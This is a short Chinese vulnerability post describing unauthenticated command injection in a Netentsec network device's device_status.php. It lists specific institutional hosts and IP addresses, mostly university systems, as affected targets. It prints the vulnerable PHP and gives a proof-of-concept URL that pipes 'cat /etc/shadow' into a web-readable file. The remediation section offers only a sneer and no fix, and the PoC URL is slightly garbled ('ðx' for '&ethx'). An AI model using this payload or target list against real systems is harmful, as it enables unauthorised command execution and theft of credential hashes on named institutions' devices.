无需登录,直接执行远程命令
初步搜索涉及以下单位及学校:
https://vpn.lib.tju.edu.cn
https:// 211.68.223.12
https://221.213.45.231
https://202.113.20.208
https://202.113.49.100/
https://122.226.150.69
https://gljy.cn
等等单位….
漏洞点
<?php
include("include/common.inc");
include("./gadgets/lib/FusionCharts.php");
include("./gadgets/lib/Utilities.php");
//Authenticate($USER_ADMIN);
switch ($action)
{
case "":
list_group("");
break;
case "reboot":
exec("sudo nohup /sbin/reboot &");
list_group("");
break;
case "poweroff":
exec("sudo /sbin/poweroff &");
list_group("");
break;
case "getethinfo":
$rtinfo = getRT($ethx); //这里触发漏洞,跟踪该函数
echo json_encode($rtinfo);
break;
}
function getRT($eth='eth0'){
$result = shell_exec("sudo /sbin/ifconfig $eth"); //这里直接执行了。。。
$ethinfo = array();
preg_match("/RX packets:\d+/",$result,$rtarr);
$ethinfo['rpackets'] = intval(substr($rtarr[0],11));
preg_match("/TX packets:\d+/",$result,$rtarr);
$ethinfo['tpackets'] = intval(substr($rtarr[0],11));
preg_match("/RX bytes:\d+/",$result,$rtarr);
$ethinfo['rbytes'] =intval(substr($rtarr[0],9));
preg_match("/TX bytes:\d+/",$result,$rtarr);
$ethinfo['tbytes'] = intval(substr($rtarr[0],9));
return $ethinfo;
}
验证方式如下:
https://www.xxxxx.com/admin/device_status.php?action=getethinfoðx=a| cat /etc/shadow > /Isc/third-party/httpd/htdocs/test.php
修复方案:
网康的设备是临时工写的么?
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;